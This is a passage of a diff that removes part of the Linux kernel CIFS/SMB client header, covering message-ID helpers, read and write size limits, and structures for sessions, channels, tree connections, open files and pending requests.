+-	__u16 mid = server->ops->get_next_mid(server);
+-	/*
+-	 * The value in the SMB header should be little endian for easy
+-	 * on-the-wire decoding.
+-	 */
+-	return cpu_to_le16(mid);
+-}
+-
+-static inline void
+-revert_current_mid(struct TCP_Server_Info *server, const unsigned int val)
+-{
+-	if (server->ops->revert_current_mid)
+-		server->ops->revert_current_mid(server, val);
+-}
+-
+-static inline void
+-revert_current_mid_from_hdr(struct TCP_Server_Info *server,
+-			    const struct smb2_hdr *shdr)
+-{
+-	unsigned int num = le16_to_cpu(shdr->CreditCharge);
+-
+-	return revert_current_mid(server, num > 0 ? num : 1);
+-}
+-
+-static inline __u16
+-get_mid(const struct smb_hdr *smb)
+-{
+-	return le16_to_cpu(smb->Mid);
+-}
+-
+-static inline bool
+-compare_mid(__u16 mid, const struct smb_hdr *smb)
+-{
+-	return mid == le16_to_cpu(smb->Mid);
+-}
+-
+-/*
+- * When the server supports very large reads and writes via POSIX extensions,
+- * we can allow up to 2^24-1, minus the size of a READ/WRITE_AND_X header, not
+- * including the RFC1001 length.
+- *
+- * Note that this might make for "interesting" allocation problems during
+- * writeback however as we have to allocate an array of pointers for the
+- * pages. A 16M write means ~32kb page array with PAGE_SIZE == 4096.
+- *
+- * For reads, there is a similar problem as we need to allocate an array
+- * of kvecs to handle the receive, though that should only need to be done
+- * once.
+- */
+-#define CIFS_MAX_WSIZE ((1<<24) - 1 - sizeof(WRITE_REQ) + 4)
+-#define CIFS_MAX_RSIZE ((1<<24) - sizeof(READ_RSP) + 4)
+-
+-/*
+- * When the server doesn't allow large posix writes, only allow a rsize/wsize
+- * of 2^17-1 minus the size of the call header. That allows for a read or
+- * write up to the maximum size described by RFC1002.
+- */
+-#define CIFS_MAX_RFC1002_WSIZE ((1<<17) - 1 - sizeof(WRITE_REQ) + 4)
+-#define CIFS_MAX_RFC1002_RSIZE ((1<<17) - 1 - sizeof(READ_RSP) + 4)
+-
+-#define CIFS_DEFAULT_IOSIZE (1024 * 1024)
+-
+-/*
+- * Windows only supports a max of 60kb reads and 65535 byte writes. Default to
+- * those values when posix extensions aren't in force. In actuality here, we
+- * use 65536 to allow for a write that is a multiple of 4k. Most servers seem
+- * to be ok with the extra byte even though Windows doesn't send writes that
+- * are that large.
+- *
+- * Citation:
+- *
+- * https://blogs.msdn.com/b/openspecification/archive/2009/04/10/smb-maximum-transmit-buffer-size-and-performance-tuning.aspx
+- */
+-#define CIFS_DEFAULT_NON_POSIX_RSIZE (60 * 1024)
+-#define CIFS_DEFAULT_NON_POSIX_WSIZE (65536)
+-
+-/*
+- * Macros to allow the TCP_Server_Info->net field and related code to drop out
+- * when CONFIG_NET_NS isn't set.
+- */
+-
+-#ifdef CONFIG_NET_NS
+-
+-static inline struct net *cifs_net_ns(struct TCP_Server_Info *srv)
+-{
+-	return srv->net;
+-}
+-
+-static inline void cifs_set_net_ns(struct TCP_Server_Info *srv, struct net *net)
+-{
+-	srv->net = net;
+-}
+-
+-#else
+-
+-static inline struct net *cifs_net_ns(struct TCP_Server_Info *srv)
+-{
+-	return &init_net;
+-}
+-
+-static inline void cifs_set_net_ns(struct TCP_Server_Info *srv, struct net *net)
+-{
+-}
+-
+-#endif
+-
+-struct cifs_server_iface {
+-	struct list_head iface_head;
+-	struct kref refcount;
+-	size_t speed;
+-	unsigned int rdma_capable : 1;
+-	unsigned int rss_capable : 1;
+-	unsigned int is_active : 1; /* unset if non existent */
+-	struct sockaddr_storage sockaddr;
+-};
+-
+-/* release iface when last ref is dropped */
+-static inline void
+-release_iface(struct kref *ref)
+-{
+-	struct cifs_server_iface *iface = container_of(ref,
+-						       struct cifs_server_iface,
+-						       refcount);
+-	list_del_init(&iface->iface_head);
+-	kfree(iface);
+-}
+-
+-/*
+- * compare two interfaces a and b
+- * return 0 if everything matches.
+- * return 1 if a has higher link speed, or rdma capable, or rss capable
+- * return -1 otherwise.
+- */
+-static inline int
+-iface_cmp(struct cifs_server_iface *a, struct cifs_server_iface *b)
+-{
+-	int cmp_ret = 0;
+-
+-	WARN_ON(!a || !b);
+-	if (a->speed == b->speed) {
+-		if (a->rdma_capable == b->rdma_capable) {
+-			if (a->rss_capable == b->rss_capable) {
+-				cmp_ret = memcmp(&a->sockaddr, &b->sockaddr,
+-						 sizeof(a->sockaddr));
+-				if (!cmp_ret)
+-					return 0;
+-				else if (cmp_ret > 0)
+-					return 1;
+-				else
+-					return -1;
+-			} else if (a->rss_capable > b->rss_capable)
+-				return 1;
+-			else
+-				return -1;
+-		} else if (a->rdma_capable > b->rdma_capable)
+-			return 1;
+-		else
+-			return -1;
+-	} else if (a->speed > b->speed)
+-		return 1;
+-	else
+-		return -1;
+-}
+-
+-struct cifs_chan {
+-	unsigned int in_reconnect : 1; /* if session setup in progress for this channel */
+-	struct TCP_Server_Info *server;
+-	struct cifs_server_iface *iface; /* interface in use */
+-	__u8 signkey[SMB3_SIGN_KEY_SIZE];
+-};
+-
+-/*
+- * Session structure.  One of these for each uid session with a particular host
+- */
+-struct cifs_ses {
+-	struct list_head smb_ses_list;
+-	struct list_head rlist; /* reconnect list */
+-	struct list_head tcon_list;
+-	struct cifs_tcon *tcon_ipc;
+-	spinlock_t ses_lock;  /* protect anything here that is not protected */
+-	struct mutex session_mutex;
+-	struct TCP_Server_Info *server;	/* pointer to server info */
+-	int ses_count;		/* reference counter */
+-	enum ses_status_enum ses_status;  /* updates protected by cifs_tcp_ses_lock */
+-	unsigned overrideSecFlg;  /* if non-zero override global sec flags */
+-	char *serverOS;		/* name of operating system underlying server */
+-	char *serverNOS;	/* name of network operating system of server */
+-	char *serverDomain;	/* security realm of server */
+-	__u64 Suid;		/* remote smb uid  */
+-	kuid_t linux_uid;	/* overriding owner of files on the mount */
+-	kuid_t cred_uid;	/* owner of credentials */
+-	unsigned int capabilities;
+-	char ip_addr[INET6_ADDRSTRLEN + 1]; /* Max ipv6 (or v4) addr string len */
+-	char *user_name;	/* must not be null except during init of sess
+-				   and after mount option parsing we fill it */
+-	char *domainName;
+-	char *password;
+-	char workstation_name[CIFS_MAX_WORKSTATION_LEN];
+-	struct session_key auth_key;
+-	struct ntlmssp_auth *ntlmssp; /* ciphertext, flags, server challenge */
+-	enum securityEnum sectype; /* what security flavor was specified? */
+-	bool sign;		/* is signing required? */
+-	bool domainAuto:1;
+-	__u16 session_flags;
+-	__u8 smb3signingkey[SMB3_SIGN_KEY_SIZE];
+-	__u8 smb3encryptionkey[SMB3_ENC_DEC_KEY_SIZE];
+-	__u8 smb3decryptionkey[SMB3_ENC_DEC_KEY_SIZE];
+-	__u8 preauth_sha_hash[SMB2_PREAUTH_HASH_SIZE];
+-
+-	/*
+-	 * Network interfaces available on the server this session is
+-	 * connected to.
+-	 *
+-	 * Other channels can be opened by connecting and binding this
+-	 * session to interfaces from this list.
+-	 *
+-	 * iface_lock should be taken when accessing any of these fields
+-	 */
+-	spinlock_t iface_lock;
+-	/* ========= begin: protected by iface_lock ======== */
+-	struct list_head iface_list;
+-	size_t iface_count;
+-	unsigned long iface_last_update; /* jiffies */
+-	/* ========= end: protected by iface_lock ======== */
+-
+-	spinlock_t chan_lock;
+-	/* ========= begin: protected by chan_lock ======== */
+-#define CIFS_MAX_CHANNELS 16
+-#define CIFS_ALL_CHANNELS_SET(ses)	\
+-	((1UL << (ses)->chan_count) - 1)
+-#define CIFS_ALL_CHANS_GOOD(ses)		\
+-	(!(ses)->chans_need_reconnect)
+-#define CIFS_ALL_CHANS_NEED_RECONNECT(ses)	\
+-	((ses)->chans_need_reconnect == CIFS_ALL_CHANNELS_SET(ses))
+-#define CIFS_SET_ALL_CHANS_NEED_RECONNECT(ses)	\
+-	((ses)->chans_need_reconnect = CIFS_ALL_CHANNELS_SET(ses))
+-#define CIFS_CHAN_NEEDS_RECONNECT(ses, index)	\
+-	test_bit((index), &(ses)->chans_need_reconnect)
+-#define CIFS_CHAN_IN_RECONNECT(ses, index)	\
+-	((ses)->chans[(index)].in_reconnect)
+-
+-	struct cifs_chan chans[CIFS_MAX_CHANNELS];
+-	size_t chan_count;
+-	size_t chan_max;
+-	atomic_t chan_seq; /* round robin state */
+-
+-	/*
+-	 * chans_need_reconnect is a bitmap indicating which of the channels
+-	 * under this smb session needs to be reconnected.
+-	 * If not multichannel session, only one bit will be used.
+-	 *
+-	 * We will ask for sess and tcon reconnection only if all the
+-	 * channels are marked for needing reconnection. This will
+-	 * enable the sessions on top to continue to live till any
+-	 * of the channels below are active.
+-	 */
+-	unsigned long chans_need_reconnect;
+-	/* ========= end: protected by chan_lock ======== */
+-};
+-
+-static inline bool
+-cap_unix(struct cifs_ses *ses)
+-{
+-	return ses->server->vals->cap_unix & ses->capabilities;
+-}
+-
+-/*
+- * common struct for holding inode info when searching for or updating an
+- * inode with new info
+- */
+-
+-#define CIFS_FATTR_DFS_REFERRAL		0x1
+-#define CIFS_FATTR_DELETE_PENDING	0x2
+-#define CIFS_FATTR_NEED_REVAL		0x4
+-#define CIFS_FATTR_INO_COLLISION	0x8
+-#define CIFS_FATTR_UNKNOWN_NLINK	0x10
+-#define CIFS_FATTR_FAKE_ROOT_INO	0x20
+-
+-struct cifs_fattr {
+-	u32		cf_flags;
+-	u32		cf_cifsattrs;
+-	u64		cf_uniqueid;
+-	u64		cf_eof;
+-	u64		cf_bytes;
+-	u64		cf_createtime;
+-	kuid_t		cf_uid;
+-	kgid_t		cf_gid;
+-	umode_t		cf_mode;
+-	dev_t		cf_rdev;
+-	unsigned int	cf_nlink;
+-	unsigned int	cf_dtype;
+-	struct timespec64 cf_atime;
+-	struct timespec64 cf_mtime;
+-	struct timespec64 cf_ctime;
+-	u32             cf_cifstag;
+-	char            *cf_symlink_target;
+-};
+-
+-/*
+- * there is one of these for each connection to a resource on a particular
+- * session
+- */
+-struct cifs_tcon {
+-	struct list_head tcon_list;
+-	int tc_count;
+-	struct list_head rlist; /* reconnect list */
+-	spinlock_t tc_lock;  /* protect anything here that is not protected */
+-	atomic_t num_local_opens;  /* num of all opens including disconnected */
+-	atomic_t num_remote_opens; /* num of all network opens on server */
+-	struct list_head openFileList;
+-	spinlock_t open_file_lock; /* protects list above */
+-	struct cifs_ses *ses;	/* pointer to session associated with */
+-	char tree_name[MAX_TREE_SIZE + 1]; /* UNC name of resource in ASCII */
+-	char *nativeFileSystem;
+-	char *password;		/* for share-level security */
+-	__u32 tid;		/* The 4 byte tree id */
+-	__u16 Flags;		/* optional support bits */
+-	enum tid_status_enum status;
+-	atomic_t num_smbs_sent;
+-	union {
+-		struct {
+-			atomic_t num_writes;
+-			atomic_t num_reads;
+-			atomic_t num_flushes;
+-			atomic_t num_oplock_brks;
+-			atomic_t num_opens;
+-			atomic_t num_closes;
+-			atomic_t num_deletes;
+-			atomic_t num_mkdirs;
+-			atomic_t num_posixopens;
+-			atomic_t num_posixmkdirs;
+-			atomic_t num_rmdirs;
+-			atomic_t num_renames;
+-			atomic_t num_t2renames;
+-			atomic_t num_ffirst;
+-			atomic_t num_fnext;
+-			atomic_t num_fclose;
+-			atomic_t num_hardlinks;
+-			atomic_t num_symlinks;
+-			atomic_t num_locks;
+-			atomic_t num_acl_get;
+-			atomic_t num_acl_set;
+-		} cifs_stats;
+-		struct {
+-			atomic_t smb2_com_sent[NUMBER_OF_SMB2_COMMANDS];
+-			atomic_t smb2_com_failed[NUMBER_OF_SMB2_COMMANDS];
+-		} smb2_stats;
+-	} stats;
+-	__u64    bytes_read;
+-	__u64    bytes_written;
+-	spinlock_t stat_lock;  /* protects the two fields above */
+-	FILE_SYSTEM_DEVICE_INFO fsDevInfo;
+-	FILE_SYSTEM_ATTRIBUTE_INFO fsAttrInfo; /* ok if fs name truncated */
+-	FILE_SYSTEM_UNIX_INFO fsUnixInfo;
+-	bool ipc:1;   /* set if connection to IPC$ share (always also pipe) */
+-	bool pipe:1;  /* set if connection to pipe share */
+-	bool print:1; /* set if connection to printer share */
+-	bool retry:1;
+-	bool nocase:1;
+-	bool nohandlecache:1; /* if strange server resource prob can turn off */
+-	bool nodelete:1;
+-	bool seal:1;      /* transport encryption for this mounted share */
+-	bool unix_ext:1;  /* if false disable Linux extensions to CIFS protocol
+-				for this mount even if server would support */
+-	bool posix_extensions; /* if true SMB3.11 posix extensions enabled */
+-	bool local_lease:1; /* check leases (only) on local system not remote */
+-	bool broken_posix_open; /* e.g. Samba server versions < 3.3.2, 3.2.9 */
+-	bool broken_sparse_sup; /* if server or share does not support sparse */
+-	bool need_reconnect:1; /* connection reset, tid now invalid */
+-	bool need_reopen_files:1; /* need to reopen tcon file handles */
+-	bool use_resilient:1; /* use resilient instead of durable handles */
+-	bool use_persistent:1; /* use persistent instead of durable handles */
+-	bool no_lease:1;    /* Do not request leases on files or directories */
+-	bool use_witness:1; /* use witness protocol */
+-	__le32 capabilities;
+-	__u32 share_flags;
+-	__u32 maximal_access;
+-	__u32 vol_serial_number;
+-	__le64 vol_create_time;
+-	__u64 snapshot_time; /* for timewarp tokens - timestamp of snapshot */
+-	__u32 handle_timeout; /* persistent and durable handle timeout in ms */
+-	__u32 ss_flags;		/* sector size flags */
+-	__u32 perf_sector_size; /* best sector size for perf */
+-	__u32 max_chunks;
+-	__u32 max_bytes_chunk;
+-	__u32 max_bytes_copy;
+-#ifdef CONFIG_CIFS_FSCACHE
+-	u64 resource_id;		/* server resource id */
+-	struct fscache_volume *fscache;	/* cookie for share */
+-#endif
+-	struct list_head pending_opens;	/* list of incomplete opens */
+-	struct cached_fids *cfids;
+-	/* BB add field for back pointer to sb struct(s)? */
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	struct list_head ulist; /* cache update list */
+-#endif
+-	struct delayed_work	query_interfaces; /* query interfaces workqueue job */
+-};
+-
+-/*
+- * This is a refcounted and timestamped container for a tcon pointer. The
+- * container holds a tcon reference. It is considered safe to free one of
+- * these when the tl_count goes to 0. The tl_time is the time of the last
+- * "get" on the container.
+- */
+-struct tcon_link {
+-	struct rb_node		tl_rbnode;
+-	kuid_t			tl_uid;
+-	unsigned long		tl_flags;
+-#define TCON_LINK_MASTER	0
+-#define TCON_LINK_PENDING	1
+-#define TCON_LINK_IN_TREE	2
+-	unsigned long		tl_time;
+-	atomic_t		tl_count;
+-	struct cifs_tcon	*tl_tcon;
+-};
+-
+-extern struct tcon_link *cifs_sb_tlink(struct cifs_sb_info *cifs_sb);
+-extern void smb3_free_compound_rqst(int num_rqst, struct smb_rqst *rqst);
+-
+-static inline struct cifs_tcon *
+-tlink_tcon(struct tcon_link *tlink)
+-{
+-	return tlink->tl_tcon;
+-}
+-
+-static inline struct tcon_link *
+-cifs_sb_master_tlink(struct cifs_sb_info *cifs_sb)
+-{
+-	return cifs_sb->master_tlink;
+-}
+-
+-extern void cifs_put_tlink(struct tcon_link *tlink);
+-
+-static inline struct tcon_link *
+-cifs_get_tlink(struct tcon_link *tlink)
+-{
+-	if (tlink && !IS_ERR(tlink))
+-		atomic_inc(&tlink->tl_count);
+-	return tlink;
+-}
+-
+-/* This function is always expected to succeed */
+-extern struct cifs_tcon *cifs_sb_master_tcon(struct cifs_sb_info *cifs_sb);
+-
+-#define CIFS_OPLOCK_NO_CHANGE 0xfe
+-
+-struct cifs_pending_open {
+-	struct list_head olist;
+-	struct tcon_link *tlink;
+-	__u8 lease_key[16];
+-	__u32 oplock;
+-};
+-
+-struct cifs_deferred_close {
+-	struct list_head dlist;
+-	struct tcon_link *tlink;
+-	__u16  netfid;
+-	__u64  persistent_fid;
+-	__u64  volatile_fid;
+-};
+-
+-/*
+- * This info hangs off the cifsFileInfo structure, pointed to by llist.
+- * This is used to track byte stream locks on the file
+- */
+-struct cifsLockInfo {
+-	struct list_head llist;	/* pointer to next cifsLockInfo */
+-	struct list_head blist; /* pointer to locks blocked on this */
+-	wait_queue_head_t block_q;
+-	__u64 offset;
+-	__u64 length;
+-	__u32 pid;
+-	__u16 type;
+-	__u16 flags;
+-};
+-
+-/*
+- * One of these for each open instance of a file
+- */
+-struct cifs_search_info {
+-	loff_t index_of_last_entry;
+-	__u16 entries_in_buffer;
+-	__u16 info_level;
+-	__u32 resume_key;
+-	char *ntwrk_buf_start;
+-	char *srch_entries_start;
+-	char *last_entry;
+-	const char *presume_name;
+-	unsigned int resume_name_len;
+-	bool endOfSearch:1;
+-	bool emptyDir:1;
+-	bool unicode:1;
+-	bool smallBuf:1; /* so we know which buf_release function to call */
+-};
+-
+-#define ACL_NO_MODE	((umode_t)(-1))
+-struct cifs_open_parms {
+-	struct cifs_tcon *tcon;
+-	struct cifs_sb_info *cifs_sb;
+-	int disposition;
+-	int desired_access;
+-	int create_options;
+-	const char *path;
+-	struct cifs_fid *fid;
+-	umode_t mode;
+-	bool reconnect:1;
+-};
+-
+-struct cifs_fid {
+-	__u16 netfid;
+-	__u64 persistent_fid;	/* persist file id for smb2 */
+-	__u64 volatile_fid;	/* volatile file id for smb2 */
+-	__u8 lease_key[SMB2_LEASE_KEY_SIZE];	/* lease key for smb2 */
+-	__u8 create_guid[16];
+-	__u32 access;
+-	struct cifs_pending_open *pending_open;
+-	unsigned int epoch;
+-#ifdef CONFIG_CIFS_DEBUG2
+-	__u64 mid;
+-#endif /* CIFS_DEBUG2 */
+-	bool purge_cache;
+-};
+-
+-struct cifs_fid_locks {
+-	struct list_head llist;
+-	struct cifsFileInfo *cfile;	/* fid that owns locks */
+-	struct list_head locks;		/* locks held by fid above */
+-};
+-
+-struct cifsFileInfo {
+-	/* following two lists are protected by tcon->open_file_lock */
+-	struct list_head tlist;	/* pointer to next fid owned by tcon */
+-	struct list_head flist;	/* next fid (file instance) for this inode */
+-	/* lock list below protected by cifsi->lock_sem */
+-	struct cifs_fid_locks *llist;	/* brlocks held by this fid */
+-	kuid_t uid;		/* allows finding which FileInfo structure */
+-	__u32 pid;		/* process id who opened file */
+-	struct cifs_fid fid;	/* file id from remote */
+-	struct list_head rlist; /* reconnect list */
+-	/* BB add lock scope info here if needed */ ;
+-	/* lock scope id (0 if none) */
+-	struct dentry *dentry;
+-	struct tcon_link *tlink;
+-	unsigned int f_flags;
+-	bool invalidHandle:1;	/* file closed via session abend */
+-	bool swapfile:1;
+-	bool oplock_break_cancelled:1;
+-	unsigned int oplock_epoch; /* epoch from the lease break */
+-	__u32 oplock_level; /* oplock/lease level from the lease break */
+-	int count;
+-	spinlock_t file_info_lock; /* protects four flag/count fields above */
+-	struct mutex fh_mutex; /* prevents reopen race after dead ses*/
+-	struct cifs_search_info srch_inf;
+-	struct work_struct oplock_break; /* work for oplock breaks */
+-	struct work_struct put; /* work for the final part of _put */
+-	struct delayed_work deferred;
+-	bool deferred_close_scheduled; /* Flag to indicate close is scheduled */
+-	char *symlink_target;
+-};
+-
+-struct cifs_io_parms {
+-	__u16 netfid;
+-	__u64 persistent_fid;	/* persist file id for smb2 */
+-	__u64 volatile_fid;	/* volatile file id for smb2 */
+-	__u32 pid;
+-	__u64 offset;
+-	unsigned int length;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-};
+-
+-struct cifs_aio_ctx {
+-	struct kref		refcount;
+-	struct list_head	list;
+-	struct mutex		aio_mutex;
+-	struct completion	done;
+-	struct iov_iter		iter;
+-	struct kiocb		*iocb;
+-	struct cifsFileInfo	*cfile;
+-	struct bio_vec		*bv;
+-	loff_t			pos;
+-	unsigned int		npages;
+-	ssize_t			rc;
+-	unsigned int		len;
+-	unsigned int		total_len;
+-	bool			should_dirty;
+-	/*
+-	 * Indicates if this aio_ctx is for direct_io,
+-	 * If yes, iter is a copy of the user passed iov_iter
+-	 */
+-	bool			direct_io;
+-};
+-
+-/* asynchronous read support */
+-struct cifs_readdata {
+-	struct kref			refcount;
+-	struct list_head		list;
+-	struct completion		done;
+-	struct cifsFileInfo		*cfile;
+-	struct address_space		*mapping;
+-	struct cifs_aio_ctx		*ctx;
+-	__u64				offset;
+-	unsigned int			bytes;
+-	unsigned int			got_bytes;
+-	pid_t				pid;
+-	int				result;
+-	struct work_struct		work;
+-	int (*read_into_pages)(struct TCP_Server_Info *server,
+-				struct cifs_readdata *rdata,
+-				unsigned int len);
+-	int (*copy_into_pages)(struct TCP_Server_Info *server,
+-				struct cifs_readdata *rdata,
+-				struct iov_iter *iter);
+-	struct kvec			iov[2];
+-	struct TCP_Server_Info		*server;
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	struct smbd_mr			*mr;
+-#endif
+-	unsigned int			pagesz;
+-	unsigned int			page_offset;
+-	unsigned int			tailsz;
+-	struct cifs_credits		credits;
+-	unsigned int			nr_pages;
+-	struct page			**pages;
+-};
+-
+-/* asynchronous write support */
+-struct cifs_writedata {
+-	struct kref			refcount;
+-	struct list_head		list;
+-	struct completion		done;
+-	enum writeback_sync_modes	sync_mode;
+-	struct work_struct		work;
+-	struct cifsFileInfo		*cfile;
+-	struct cifs_aio_ctx		*ctx;
+-	__u64				offset;
+-	pid_t				pid;
+-	unsigned int			bytes;
+-	int				result;
+-	struct TCP_Server_Info		*server;
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	struct smbd_mr			*mr;
+-#endif
+-	unsigned int			pagesz;
+-	unsigned int			page_offset;
+-	unsigned int			tailsz;
+-	struct cifs_credits		credits;
+-	unsigned int			nr_pages;
+-	struct page			**pages;
+-};
+-
+-/*
+- * Take a reference on the file private data. Must be called with
+- * cfile->file_info_lock held.
+- */
+-static inline void
+-cifsFileInfo_get_locked(struct cifsFileInfo *cifs_file)
+-{
+-	++cifs_file->count;
+-}
+-
+-struct cifsFileInfo *cifsFileInfo_get(struct cifsFileInfo *cifs_file);
+-void _cifsFileInfo_put(struct cifsFileInfo *cifs_file, bool wait_oplock_hdlr,
+-		       bool offload);
+-void cifsFileInfo_put(struct cifsFileInfo *cifs_file);
+-
+-#define CIFS_CACHE_READ_FLG	1
+-#define CIFS_CACHE_HANDLE_FLG	2
+-#define CIFS_CACHE_RH_FLG	(CIFS_CACHE_READ_FLG | CIFS_CACHE_HANDLE_FLG)
+-#define CIFS_CACHE_WRITE_FLG	4
+-#define CIFS_CACHE_RW_FLG	(CIFS_CACHE_READ_FLG | CIFS_CACHE_WRITE_FLG)
+-#define CIFS_CACHE_RHW_FLG	(CIFS_CACHE_RW_FLG | CIFS_CACHE_HANDLE_FLG)
+-
+-#define CIFS_CACHE_READ(cinode) ((cinode->oplock & CIFS_CACHE_READ_FLG) || (CIFS_SB(cinode->netfs.inode.i_sb)->mnt_cifs_flags & CIFS_MOUNT_RO_CACHE))
+-#define CIFS_CACHE_HANDLE(cinode) (cinode->oplock & CIFS_CACHE_HANDLE_FLG)
+-#define CIFS_CACHE_WRITE(cinode) ((cinode->oplock & CIFS_CACHE_WRITE_FLG) || (CIFS_SB(cinode->netfs.inode.i_sb)->mnt_cifs_flags & CIFS_MOUNT_RW_CACHE))
+-
+-/*
+- * One of these for each file inode
+- */
+-
+-struct cifsInodeInfo {
+-	struct netfs_inode netfs; /* Netfslib context and vfs inode */
+-	bool can_cache_brlcks;
+-	struct list_head llist;	/* locks helb by this inode */
+-	/*
+-	 * NOTE: Some code paths call down_read(lock_sem) twice, so
+-	 * we must always use cifs_down_write() instead of down_write()
+-	 * for this semaphore to avoid deadlocks.
+-	 */
+-	struct rw_semaphore lock_sem;	/* protect the fields above */
+-	/* BB add in lists for dirty pages i.e. write caching info for oplock */
+-	struct list_head openFileList;
+-	spinlock_t	open_file_lock;	/* protects openFileList */
+-	__u32 cifsAttrs; /* e.g. DOS archive bit, sparse, compressed, system */
+-	unsigned int oplock;		/* oplock/lease level we have */
+-	unsigned int epoch;		/* used to track lease state changes */
+-#define CIFS_INODE_PENDING_OPLOCK_BREAK   (0) /* oplock break in progress */
+-#define CIFS_INODE_PENDING_WRITERS	  (1) /* Writes in progress */
+-#define CIFS_INODE_FLAG_UNUSED		  (2) /* Unused flag */
+-#define CIFS_INO_DELETE_PENDING		  (3) /* delete pending on server */
+-#define CIFS_INO_INVALID_MAPPING	  (4) /* pagecache is invalid */
+-#define CIFS_INO_LOCK			  (5) /* lock bit for synchronization */
+-#define CIFS_INO_MODIFIED_ATTR            (6) /* Indicate change in mtime/ctime */
+-#define CIFS_INO_CLOSE_ON_LOCK            (7) /* Not to defer the close when lock is set */
+-	unsigned long flags;
+-	spinlock_t writers_lock;
+-	unsigned int writers;		/* Number of writers on this inode */
+-	unsigned long time;		/* jiffies of last update of inode */
+-	u64  server_eof;		/* current file size on server -- protected by i_lock */
+-	u64  uniqueid;			/* server inode number */
+-	u64  createtime;		/* creation time on server */
+-	__u8 lease_key[SMB2_LEASE_KEY_SIZE];	/* lease key for this inode */
+-	struct list_head deferred_closes; /* list of deferred closes */
+-	spinlock_t deferred_lock; /* protection on deferred list */
+-	bool lease_granted; /* Flag to indicate whether lease or oplock is granted. */
+-	char *symlink_target;
+-};
+-
+-static inline struct cifsInodeInfo *
+-CIFS_I(struct inode *inode)
+-{
+-	return container_of(inode, struct cifsInodeInfo, netfs.inode);
+-}
+-
+-static inline struct cifs_sb_info *
+-CIFS_SB(struct super_block *sb)
+-{
+-	return sb->s_fs_info;
+-}
+-
+-static inline struct cifs_sb_info *
+-CIFS_FILE_SB(struct file *file)
+-{
+-	return CIFS_SB(file_inode(file)->i_sb);
+-}
+-
+-static inline char CIFS_DIR_SEP(const struct cifs_sb_info *cifs_sb)
+-{
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_POSIX_PATHS)
+-		return '/';
+-	else
+-		return '\\';
+-}
+-
+-static inline void
+-convert_delimiter(char *path, char delim)
+-{
+-	char old_delim, *pos;
+-
+-	if (delim == '/')
+-		old_delim = '\\';
+-	else
+-		old_delim = '/';
+-
+-	pos = path;
+-	while ((pos = strchr(pos, old_delim)))
+-		*pos = delim;
+-}
+-
+-#define cifs_stats_inc atomic_inc
+-
+-static inline void cifs_stats_bytes_written(struct cifs_tcon *tcon,
+-					    unsigned int bytes)
+-{
+-	if (bytes) {
+-		spin_lock(&tcon->stat_lock);
+-		tcon->bytes_written += bytes;
+-		spin_unlock(&tcon->stat_lock);
+-	}
+-}
+-
+-static inline void cifs_stats_bytes_read(struct cifs_tcon *tcon,
+-					 unsigned int bytes)
+-{
+-	spin_lock(&tcon->stat_lock);
+-	tcon->bytes_read += bytes;
+-	spin_unlock(&tcon->stat_lock);
+-}
+-
+-
+-/*
+- * This is the prototype for the mid receive function. This function is for
+- * receiving the rest of the SMB frame, starting with the WordCount (which is
+- * just after the MID in struct smb_hdr). Note:
+- *
+- * - This will be called by cifsd, with no locks held.
+- * - The mid will still be on the pending_mid_q.
+- * - mid->resp_buf will point to the current buffer.
+- *
+- * Returns zero on a successful receive, or an error. The receive state in
+- * the TCP_Server_Info will also be updated.
+- */
+-typedef int (mid_receive_t)(struct TCP_Server_Info *server,
+-			    struct mid_q_entry *mid);
+-
+-/*
+- * This is the prototype for the mid callback function. This is called once the
+- * mid has been received off of the socket. When creating one, take special
+- * care to avoid deadlocks. Things to bear in mind:
+- *
+- * - it will be called by cifsd, with no locks held
+- * - the mid will be removed from any lists
+- */
+-typedef void (mid_callback_t)(struct mid_q_entry *mid);
+-
+-/*
+- * This is the protopyte for mid handle function. This is called once the mid
+- * has been recognized after decryption of the message.
+- */
+-typedef int (mid_handle_t)(struct TCP_Server_Info *server,
+-			    struct mid_q_entry *mid);
+-
+-/* one of these for every pending CIFS request to the server */
+-struct mid_q_entry {
+-	struct list_head qhead;	/* mids waiting on reply from this server */
+-	struct kref refcount;
+-	struct TCP_Server_Info *server;	/* server corresponding to this mid */
+-	__u64 mid;		/* multiplex id */
+-	__u16 credits;		/* number of credits consumed by this mid */
+-	__u16 credits_received;	/* number of credits from the response */
+-	__u32 pid;		/* process id */
+-	__u32 sequence_number;  /* for CIFS signing */
+-	unsigned long when_alloc;  /* when mid was created */
+-#ifdef CONFIG_CIFS_STATS2
+-	unsigned long when_sent; /* time when smb send finished */
+-	unsigned long when_received; /* when demux complete (taken off wire) */
+-#endif
+-	mid_receive_t *receive; /* call receive callback */
+-	mid_callback_t *callback; /* call completion callback */
+-	mid_handle_t *handle; /* call handle mid callback */
+-	void *callback_data;	  /* general purpose pointer for callback */
+-	struct task_struct *creator;
+-	void *resp_buf;		/* pointer to received SMB header */
+-	unsigned int resp_buf_size;
+-	int mid_state;	/* wish this were enum but can not pass to wait_event */
+-	unsigned int mid_flags;
+-	__le16 command;		/* smb command code */
+-	unsigned int optype;	/* operation type */
+-	bool large_buf:1;	/* if valid response, is pointer to large buf */
+-	bool multiRsp:1;	/* multiple trans2 responses for one request  */
+-	bool multiEnd:1;	/* both received */
+-	bool decrypted:1;	/* decrypted entry */
+-};
+-
+-struct close_cancelled_open {
+-	struct cifs_fid         fid;
+-	struct cifs_tcon        *tcon;
+-	struct work_struct      work;
+-	__u64 mid;
+-	__u16 cmd;
+-};
+-
+-/*	Make code in transport.c a little cleaner by moving
+-	update of optional stats into function below */
+-static inline void cifs_in_send_inc(struct TCP_Server_Info *server)
+-{
+-	atomic_inc(&server->in_send);
+-}
+-
+-static inline void cifs_in_send_dec(struct TCP_Server_Info *server)
+-{
+-	atomic_dec(&server->in_send);
+-}
+-
+-static inline void cifs_num_waiters_inc(struct TCP_Server_Info *server)
+-{
+-	atomic_inc(&server->num_waiters);
+-}
+-
+-static inline void cifs_num_waiters_dec(struct TCP_Server_Info *server)
+-{
+-	atomic_dec(&server->num_waiters);
+-}
+-
+-#ifdef CONFIG_CIFS_STATS2
+-static inline void cifs_save_when_sent(struct mid_q_entry *mid)
+-{
+-	mid->when_sent = jiffies;
+-}
+-#else
+-static inline void cifs_save_when_sent(struct mid_q_entry *mid)
+-{
+-}
+-#endif
+-
+-/* for pending dnotify requests */
+-struct dir_notify_req {
+-	struct list_head lhead;
